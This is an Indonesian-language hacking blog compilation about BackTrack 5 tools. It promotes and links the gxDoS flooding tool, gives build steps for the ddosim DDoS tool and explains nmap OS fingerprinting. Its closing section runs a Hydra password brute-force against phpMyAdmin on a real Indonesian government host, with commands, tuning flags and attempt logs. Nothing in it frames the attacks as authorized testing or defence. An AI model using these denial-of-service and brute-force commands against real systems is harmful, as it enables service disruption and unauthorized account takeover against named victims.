6. http://www.webhostingtalk.com/showthread.php?t=899608
nih yang ini buat mesin linux 2.5 juta perak buat jadi ipv6 ddos ranger haha

Code:
http://www.theregister.co.uk/2007/05/11/ipv6_flaw_scramble/
yang ini orang yang kena attack DDOS ipv6

Code:
http://notetome.blogspot.com/2010/11/our-server-is-getting-attacked-by-ddos.html

Denial of Service [ DDOS ]


Another tools original kreasi anak bangsa haha..
Sebelumnya salam kenal buat agan2 semua disini, masih nubi nih  mau sharing aja..
Pastinya udah pada tau kalau yang namanya denial of service atau ddos itu mungkin sampai sekarang belom ada obatnya.. nah di backtrack ada beberapa yg kita tau seperti syn flood, slowloris, hping3, etc.. pasti agan2 disini udah ada yang pernah nyobain salah satu di antaranya, hmm.. berarti gak ada salahnya untuk nyoba tools buatan anak bangsa, dalam negeri gan hehe Authornya asli dari dalam negri, namanya abi tinggal nya di bekasi hihihi..
Oke langsung aja nih..

Sedikit penjelasan tentang tools ini.
Nama tools nya gxDoS
* feature yang ada adalah :
- arp flood
- tcp flood
- udp flood
- ping of death
Bisa di lihat dan di rasain nanti perbedaannya, powerful
Sample output untuk gxDos :

Seperti halnya tools yg lain, gxDoS ini pun ada requirement nya yaitu scapy. Scapy merupakan modul dari python yg menjadi salah satu depedensinya namun pengecualiannya yaitu, pada BackTrack 5 yg sekarang scapy telah di include. jadi agan2 gak perlu install lagi karena gxDos langsung bisa di gunakan.. Sekilas README yg berisi HOW-TO tentang gxDoS bisa di lihat di link di bawah ini :

- HOW TO : http://bt.gxrg.org/other/tools/scrip...v.0.0.1/README

gxDoS.py v.0.0.1 bisa di download di link di bawah ini :

- Download : http://bt.gxrg.org/other/tools/scrip...gxDoS-v.0.0.1/

Berhubung masih dalam suasana lebaran, Mohon maaf lahir dan batin yaaa kalo ada kata2 gw yang salah atau dari gaya bahasa dan cara nulisnya hehehe mohon di maklumin gan masih nubi..

DDosim bt5


lanjutin tuts ddosim dari mastah murray ---------------------

Ketika mencoba untuk meng-compile ddosim pada BT5 pasti keluar error, karena library bawaan BT5 lebih baru dibandingkan yg diperlukan ddosim (libnet0 dan libnet0-dev yg sudah absolete aka tidak di-update lagi).
Langsung aja ya ke tutsnya
Spoiler for ddosim-bt5:
DDOSIM On Backtrack 5
1. Donlot dulu paket libnet0 dan libnet0-dev yg diperlukan dari sini(kernel.org) beserta ddosim
UPDATE :
link local libnet0 dari mastah murray
Spoiler for libnet0:

sesuaikan paket dengan sistem anda.
- BT 32bit --> pilih yg belakangnya i386.deb
- BT 64bit --> pilih yg belakangnya amd64.deb
2. install libnet0 yg telah di donlot: (hasil donlot ane di '~/Desktop')
Code:
root@bt:~# cd Desktop/     
root@bt:~/Desktop# dpkg -i libnet0_1.0.2a-7_i386.deb
root@bt:~/Desktop# dpkg -i libnet0-dev_1.0.2a-7_i386.deb
3. selanjutnya compile dan install ddosim
Code:
root@bt:~/Desktop# apt-get install build-essential
root@bt:~/Desktop# apt-get install libpcap-dev
root@bt:~/Desktop# tar xfvz ddosim-0.2.tar.gz 
root@bt:~/Desktop# cd ddosim-0.2
root@bt:~/Desktop/ddosim-0.2# ./configure 
root@bt:~/Desktop/ddosim-0.2# make
root@bt:~/Desktop/ddosim-0.2# make install
4. untuk mengecek apakah ddosim terinstall dengan benar, ketik 'ddosim'.
apabila keluar option penggunaan ddosim berarti sudah terinstall dengan baik

* tested on BT5 x86 gnome
contoh penggunaan ddosim ada dipost mastah murray yg disertakan pada awal post

Sabtu, 27 April 2013

nmap buat nebak OS

Quote:Original Posted By fuzamaru

maksutnya kita ga boleh pake yang " : ) " lagi gan kalo  boleh ga ?
----------------
sepuh skalian nanya ane kan udah downloaddriver dari nvidia gvorce dan dapet dengan file tipe berupa .run ane klik ternyata ga otomatis jadi sebenernya cara ngistallnya gimana si


terserah asal jangan : )

---------------------------------

masuk ke init 3 (CTRL + ALT + SHIFT + 3)

Quote:# sh nvidia-driver.run

Quote:Original Posted By drewkiller
Bro murray, gw mo nanya nih soal Nmap di BT5..
gw pernah scan dengan perintah gini di terminal

tapi knapa ya kadang2 gak berhasil tampilin info OS dan lain2nya..
(intinya kadang berhasil,tp kdng juga gak)

sbenernya Faktor yg pengaruhi kberhasilan scaning Nmap ini apa ya?
apa ada teknik trtentu biar Nmap jadi maksimal ? klo ada,ajarin ya Bro..



NMAP nebak OS korban dengan melakukan analisa sampling TCP ISN yang diambil nmap ketika melakukan scanning.

sample TCP ISN di analisa setiap bit, dan dicocokan dengan database OS NMAP, jadi NMAP juga enggak tau pasti OS dari setiap korban yang bakal di scan sama NMAP.

nah kalo lo misal mau ambil sample dari air yang tercemar di sungai apa aja kira kira most important step?

1. deket sama sumber (karena semakin deket sama sumber semakin bagus)
2. ambil sample dimana sumber tersebut berada.
3. singkirin dulu noise / host host lain
4. gunain timing NMAP yang mixed antara lama sama sekali toel.
5. etc tergantung kondisi.

Brute Password phpmyadmin....!!!

Quote:Original Posted By linuxeruciha
sebelmnya mhn maaf jika ada kata-kata yang salah...
gan ane mau tanya kira-kira kalau tools di backtrack untuk brute password phpmyadmin ada ?????


phpmyadmin auth ref : http://wiki.phpmyadmin.net/pma/Auth_types

Quote:auth_type http also prompts for a MySQL username and password, but does so using HTTP Basic authentication. The look of the prompt is determined by the browser; most pop up a login window.

kita pake hydra aja deh.

contoh :

untuk awal pasti begini, timeout

Quote:root@root:~# hydra -l root -P /pentest/passwords/wordlists/darkc0de.lst air.bappenas.go.id http-head /phpmyadmin/
Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-16 07:10:48
[DATA] 16 tasks, 1 servers, 1707656 login tries (l:1/p:1707656), ~106728 tries per task
[DATA] attacking service http-head on port 80
Warning: Timeout from child 0, restarting
Warning: Timeout from child 1, restarting
Warning: Timeout from child 2, restarting
Warning: Timeout from child 3, restarting
Warning: Timeout from child 4, restarting
Warning: Timeout from child 5, restarting
Warning: Timeout from child 6, restarting
Warning: Timeout from child 7, restarting
Warning: Timeout from child 8, restarting
Warning: Timeout from child 9, restarting
Warning: Timeout from child 10, restarting
Warning: Timeout from child 11, restarting
Warning: Timeout from child 12, restarting
Warning: Timeout from child 13, restarting
Warning: Timeout from child 14, restarting
Warning: Timeout from child 15, restarting


kita naikin timeout time nya jadi 50 (default : 20), lalu turunin thread nya jadi 10 (default : 16)

Quote:root@root:~# hydra -l root -P /pentest/passwords/wordlists/darkc0de.lst air.bappenas.go.id http-head /phpmyadmin/ -t 10 -w 50
Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-16 06:56:16
[DATA] 10 tasks, 1 servers, 1707656 login tries (l:1/p:1707656), ~170765 tries per task
[DATA] attacking service http-get on port 80
[STATUS] 1447.00 tries/min, 1447 tries in 00:01h, 1706209 todo in 19:40h
[STATUS] 1442.33 tries/min, 4327 tries in 00:03h, 1703329 todo in 19:41h


ini contoh nambahin Verbose

Quote:root@root:~# hydra -l root -P /pentest/passwords/wordlists/darkc0de.lst air.bappenas.go.id http-head /phpmyadmin/ -t 10 -w 50 -V
Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-16 07:05:24
[DATA] 10 tasks, 1 servers, 1707656 login tries (l:1/p:1707656), ~170765 tries per task
[DATA] attacking service http-head on port 80
[ATTEMPT] target air.bappenas.go.id - login "root" - pass "" - child 0 - 1 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 1 - 2 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 2 - 3 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 3 - 4 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 4 - 5 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 5 - 6 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 6 - 7 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 7 - 8 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " - child 8 - 9 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass " " - child 9 - 10 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass "!magnus" - child 0 - 11 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass "!power" - child 9 - 12 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass ""A" SIDES" - child 3 - 13 of 1707656
[ATTEMPT] target air.bappenas.go.id - login "root" - pass ""DETROIT" GARY & CC TH WIGGINS" - child 0 - 14 of 1707656
-------8<---------snip
[ATTEMPT] target air.bappenas.go.id - login "root" - pass "# List of common male names." - child 1 - 56 of 1707656


good luck!